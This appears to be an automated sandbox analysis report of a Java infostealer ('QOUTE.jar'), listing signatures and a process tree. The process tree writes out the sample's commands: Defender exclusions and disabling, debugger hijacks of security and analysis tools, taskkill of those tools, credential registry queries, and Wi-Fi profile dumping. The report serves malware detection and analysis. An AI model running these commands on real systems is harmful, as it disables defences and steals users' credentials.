Analysis
-
max time kernel
142s -
max time network
123s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
12-07-2020 08:14
General
-
Target
QOUTE.jar
-
Size
402KB
-
MD5
0a79ac74d72bd78b14f2620336eb8154
-
SHA1
cb35e25fd05a342c3201cc7e7c81aa4f7fca99f7
-
SHA256
b52f595bcd319fb9a253efa0c694fcaea8662b0fd34bb384612c1006cc112bd8
-
SHA512
7b74e2c7568a38045c1d760589193e716767e568809391980df03f197515ced2c535ad0d1612e5d05f56ab1684b4bbae562764606a96106909c00e848ccf784a
Score
10/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run entry to start application 2 TTPs 4 IoCs
-
Drops desktop.ini file(s) 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 544 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Sets file execution options in registry 2 TTPs 32 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies service 2 TTPs 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 138 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
-
Loads dropped DLL 3 IoCs
-
Kills process with taskkill 16 IoCs
-
Checks for installed software on the system 1 TTPs 20 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Drops file in System32 directory 2 IoCs
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QOUTE.jar1⤵
- Adds Run entry to start application
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Drops file in System32 directory
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\roBcX\xvPwc.class2⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\roBcX','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\roBcX\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\FTPware\CoreFTP\Sites" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\FTPware\CoreFTP\Sites" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Adobe\Common" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Adobe\Common" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Beyluxe Messenger" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Beyluxe Messenger" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\username" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\username" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\password" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\password" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\A.V.M.\Paltalk NG\common_settings\core\users\creds" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\A.V.M.\Paltalk NG\common_settings\core\users\creds" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Modifies service
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe -a C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json2⤵
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exeC:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe -a C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.ntusernt.ini
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\License.XenArmor
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\License.XenArmor
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenManager.dll
-
C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json
-
C:\Users\Admin\roBcX\Desktop.ini
-
C:\Users\Admin\roBcX\xvPwc.class
-
\Users\Admin\AppData\Local\Temp\IFHUmsSLMV1272646025045097700.xml
-
\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenManager.dll
-
\Users\Admin\AppData\Local\Temp\sqlite-unknown-e6843014-4b9a-421a-9f6e-f08839b36fa6-sqlitejdbc.dll
-
memory/108-31-0x0000000000000000-mapping.dmp
-
memory/268-35-0x0000000000000000-mapping.dmp
-
memory/308-47-0x0000000000000000-mapping.dmp
-
memory/464-12-0x0000000000000000-mapping.dmp
-
memory/520-10-0x0000000000000000-mapping.dmp
-
